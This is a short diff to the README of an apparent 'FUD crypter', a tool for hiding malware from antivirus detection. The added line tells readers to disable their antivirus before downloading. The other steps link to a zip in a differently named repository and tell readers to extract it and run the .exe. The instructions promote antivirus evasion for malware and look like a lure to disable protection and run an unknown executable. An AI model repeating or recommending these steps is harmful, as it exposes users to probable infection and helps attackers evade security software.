fren3tic/GHOST-FUD-CRYPTER/README.md

 Usage/Install
 -----
+- Before downloading you will need to disable your Anti-Virus, otherwise it sends your crypted file to the Anti-Virus company
 - Click <a href="https://github.com/hackerOrionX/ORIONX-FUD-CRYPTER/archive/refs/heads/main.zip">HERE</a> to download
 - EXTRACT before using otherwise the script will not work correctly
 - Run the .exe